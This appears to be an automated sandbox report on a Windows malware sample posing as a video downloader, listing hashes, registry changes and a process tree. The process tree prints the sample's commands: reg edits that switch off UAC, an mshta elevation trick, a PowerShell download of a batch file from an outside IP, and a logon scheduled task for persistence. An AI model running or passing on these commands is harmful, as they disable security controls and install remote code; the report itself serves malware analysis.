Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 11:23
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
pornhub_downloader.exe
Resource
win7-20240508-en
windows7-x64
12 signatures
150 seconds
Behavioral task
behavioral2
Sample
pornhub_downloader.exe
Resource
win10v2004-20240611-en
windows10-2004-x64
16 signatures
150 seconds
General
-
Target
pornhub_downloader.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
pid Process 860 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2576 attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1712 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{44694951-28AE-11EF-B21B-FA9381F5F0AB} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000081980bbe35e4623f41ca4d28e3301ef82dfed7a54a923393549fe4efc5843223000000000e8000000002000020000000d357491431c1c1b45d20d95713ae91f248047ce72ef614871b08920bdcb2eb40900000009cea3f760c990f36a7d66e23228b6128f47b154f50c00c8c68bfca379788ace5f3d00fa2ae78b2a027a4c93d55ad04552c9287d87170256d2d81aa4787033681e118b913a63766c34e3c7c033ead149dc882f8d40600a13a7d3d52ef0edcc5b83abc82183b48634e15d2c0bb4d6849b9d6d25cac50750ed176d9f948ccffef8fb3e5e558d45e1e0826a9f19670dd77ad400000003fb1d44d7a6c22a17f3b4666a62089ecd616c505007929c09217c3f066d7cf45698a5903d208fe7b93ee9670f334f4f5d7efd9422befaaa3deecf162c667dc1b iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "424353331" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000097ae506894f6ee0a388dad475b0942312d64b0f1cdfc3c0df350862c41f7df45000000000e80000000020000200000000dc33f8877365ae14214b4886b80b97d82ed9353d1fc438f0dc96a2d864b9f302000000045c096954e7f8d9ab2a0d9ed0d6c473a6c77ddc43565edbf2b30a60521aff5e540000000158a43a8e68c7e0614844f1624232b0c147c2fd7b1565346130031f9dde29346af7400bcc7c77d9a0f332f1ddf05f5023d644245b7684796d9676b746cc9c27e iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6007fc29bbbcda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 860 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2556 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2556 iexplore.exe 2556 iexplore.exe 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2468 wrote to memory of 1264 2468 pornhub_downloader.exe 28 PID 2468 wrote to memory of 1264 2468 pornhub_downloader.exe 28 PID 2468 wrote to memory of 1264 2468 pornhub_downloader.exe 28 PID 2468 wrote to memory of 1264 2468 pornhub_downloader.exe 28 PID 1264 wrote to memory of 2744 1264 cmd.exe 30 PID 1264 wrote to memory of 2744 1264 cmd.exe 30 PID 1264 wrote to memory of 2744 1264 cmd.exe 30 PID 2744 wrote to memory of 2360 2744 mshta.exe 31 PID 2744 wrote to memory of 2360 2744 mshta.exe 31 PID 2744 wrote to memory of 2360 2744 mshta.exe 31 PID 2744 wrote to memory of 2360 2744 mshta.exe 31 PID 2360 wrote to memory of 2760 2360 PORNHU~1.EXE 32 PID 2360 wrote to memory of 2760 2360 PORNHU~1.EXE 32 PID 2360 wrote to memory of 2760 2360 PORNHU~1.EXE 32 PID 2360 wrote to memory of 2760 2360 PORNHU~1.EXE 32 PID 2760 wrote to memory of 2708 2760 cmd.exe 34 PID 2760 wrote to memory of 2708 2760 cmd.exe 34 PID 2760 wrote to memory of 2708 2760 cmd.exe 34 PID 2760 wrote to memory of 2708 2760 cmd.exe 34 PID 2760 wrote to memory of 2992 2760 cmd.exe 35 PID 2760 wrote to memory of 2992 2760 cmd.exe 35 PID 2760 wrote to memory of 2992 2760 cmd.exe 35 PID 2760 wrote to memory of 2992 2760 cmd.exe 35 PID 2760 wrote to memory of 2688 2760 cmd.exe 36 PID 2760 wrote to memory of 2688 2760 cmd.exe 36 PID 2760 wrote to memory of 2688 2760 cmd.exe 36 PID 2760 wrote to memory of 2688 2760 cmd.exe 36 PID 2760 wrote to memory of 2380 2760 cmd.exe 37 PID 2760 wrote to memory of 2380 2760 cmd.exe 37 PID 2760 wrote to memory of 2380 2760 cmd.exe 37 PID 2760 wrote to memory of 2380 2760 cmd.exe 37 PID 2380 wrote to memory of 2672 2380 cmd.exe 38 PID 2380 wrote to memory of 2672 2380 cmd.exe 38 PID 2380 wrote to memory of 2672 2380 cmd.exe 38 PID 2380 wrote to memory of 2672 2380 cmd.exe 38 PID 2760 wrote to memory of 2556 2760 cmd.exe 39 PID 2760 wrote to memory of 2556 2760 cmd.exe 39 PID 2760 wrote to memory of 2556 2760 cmd.exe 39 PID 2760 wrote to memory of 2556 2760 cmd.exe 39 PID 2760 wrote to memory of 2576 2760 cmd.exe 40 PID 2760 wrote to memory of 2576 2760 cmd.exe 40 PID 2760 wrote to memory of 2576 2760 cmd.exe 40 PID 2760 wrote to memory of 2576 2760 cmd.exe 40 PID 2760 wrote to memory of 860 2760 cmd.exe 41 PID 2760 wrote to memory of 860 2760 cmd.exe 41 PID 2760 wrote to memory of 860 2760 cmd.exe 41 PID 2760 wrote to memory of 860 2760 cmd.exe 41 PID 2556 wrote to memory of 2728 2556 iexplore.exe 42 PID 2556 wrote to memory of 2728 2556 iexplore.exe 42 PID 2556 wrote to memory of 2728 2556 iexplore.exe 42 PID 2556 wrote to memory of 2728 2556 iexplore.exe 42 PID 2760 wrote to memory of 1712 2760 cmd.exe 43 PID 2760 wrote to memory of 1712 2760 cmd.exe 43 PID 2760 wrote to memory of 1712 2760 cmd.exe 43 PID 2760 wrote to memory of 1712 2760 cmd.exe 43 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2576 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2175.tmp\2176.tmp\2177.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\229E.tmp\229F.tmp\22A0.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2708
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:2672
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2728
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\SysWOW64\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Creates scheduled task(s)
PID:1712
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f